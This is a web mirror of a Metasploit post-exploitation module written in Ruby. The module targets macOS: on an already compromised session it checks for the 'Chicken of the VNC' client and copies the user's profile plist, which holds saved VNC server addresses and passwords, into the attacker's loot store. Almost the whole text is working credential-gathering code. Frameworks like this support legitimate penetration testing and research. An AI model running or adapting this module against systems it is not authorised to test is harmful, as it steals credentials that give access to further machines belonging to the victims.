Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/post/osx/gather/enum_chicken_vnc_profile.rb
19639 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Post

7
  include Msf::Post::File

8


9
  def initialize(info = {})

10
    super(

11
      update_info(

12
        info,

13
        'Name' => 'OS X Gather Chicken of the VNC Profile',

14
        'Description' => %q{

15
          This module will download the "Chicken of the VNC" client application's

16
          profile file,	which is used to store other VNC servers' information such

17
          as the IP and password.

18
        },

19
        'License' => MSF_LICENSE,

20
        'Author' => [ 'sinn3r'],

21
        'Platform' => [ 'osx' ],

22
        'SessionTypes' => [ 'meterpreter', 'shell' ],

23
        'Notes' => {

24
          'Stability' => [CRASH_SAFE],

25
          'SideEffects' => [],

26
          'Reliability' => []

27
        }

28
      )

29
    )

30
  end

31


32
  def whoami

33
    exec('/usr/bin/whoami')

34
  end

35


36
  #

37
  # This is just a wrapper for cmd_exec(), except it chomp() the output,

38
  # and retry under certain conditions.

39
  #

40
  def exec(cmd)

41
    tries = 0

42
    begin

43
      cmd_exec(cmd).chomp

44
    rescue ::Timeout::Error => e

45
      tries += 1

46
      if tries < 3

47
        vprint_error("#{@peer} - #{e.message} - retrying...")

48
        retry

49
      end

50
    rescue EOFError => e

51
      tries += 1

52
      if tries < 3

53
        vprint_error("#{@peer} - #{e.message} - retrying...")

54
        retry

55
      end

56
    end

57
  end

58


59
  def dir(path)

60
    subdirs = exec("ls -l #{path}")

61
    return [] if subdirs =~ /No such file or directory/

62


63
    items = subdirs.scan(/[A-Z][a-z][a-z]\x20+\d+\x20[\d:]+\x20(.+)$/).flatten

64
    return items

65
  end

66


67
  def locate_chicken

68
    dir('/Applications/').each do |folder|

69
      return true if folder.match(/Chicken of the VNC\.app/)

70
    end

71


72
    return false

73
  end

74


75
  def get_profile_plist(user)

76
    f = exec("cat /Users/#{user}/Library/Preferences/com.geekspiff.chickenofthevnc.plist")

77


78
    if f =~ /No such file or directory/

79
      return nil

80
    end

81


82
    f

83
  end

84


85
  def save(file)

86
    p = store_loot(

87
      'chickenvnc.profile',

88
      'bin',

89
      session,

90
      file,

91
      'com.geekspiff.chickenofthevnc.plist'

92
    )

93


94
    print_good("#{@peer} - plist saved in #{p}")

95
  end

96


97
  def run

98
    @peer = "#{session.session_host}:#{session.session_port}"

99
    user = whoami

100


101
    if !locate_chicken

102
      print_error("#{@peer} - Chicken of the VNC is not installed")

103
      return

104
    end

105


106
    print_status("#{@peer} - Chicken of the VNC found")

107


108
    plist = get_profile_plist(user)

109
    if plist.nil?

110
      print_error('No profile plist found')

111
    elsif !plist.nil?

112
      save(plist)

113
    end

114
  end

115
end

116


117